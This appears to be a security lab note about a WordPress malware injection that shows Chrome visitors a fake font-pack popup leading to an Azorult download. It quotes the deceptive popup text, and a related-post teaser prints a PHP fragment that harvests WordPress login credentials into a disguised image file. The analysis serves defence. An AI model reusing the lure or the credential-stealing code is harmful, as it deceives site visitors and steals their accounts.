“Google Fonts” popup leads to malware

Labs Note

A recent malware injection in a client\’s WordPress file was found to be targeting website visitors that were using the Google Chrome browser to access the infected website. It uses Javascript to detect the visitor\’s use of Google Chrome and then upon the visitor clicking it generates a popup notification which falsely claims that the visitor\’s Google Chrome is missing the HoeflerText font and that it is preventing the website from loading correctly.

It then instructs the website visitor to click a button on the popup notification – which then ends with a serious Azorult malicious .exe being downloaded to the website visitor\’s machine. It looks like this specific Azorult malware family was recently updated and it seems to currently have a detection rate of under 50% for major anti-virus softwares.


The \"HoeflerText\" font wasn't found.

The web page you are trying to load is displayed incorrectly, as it uses the \"HoeflerText\" font. To fix the error and display the text, you have to update the \"Chrome Font Pack\".

Step 1: In the bottom left corner of the screen you'll see the download bar. Click on the Chrome_Font.exe item.
Step 2: Press Yes(Run) in order to see the correct content on the web page.

Manufacturer:   Google Inc. All Rights Reserved
Current version:    Chrome Font Pack 53.0.2785.89
Latest version: Chrome Font Pack 57.2.5284.21

Update
You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post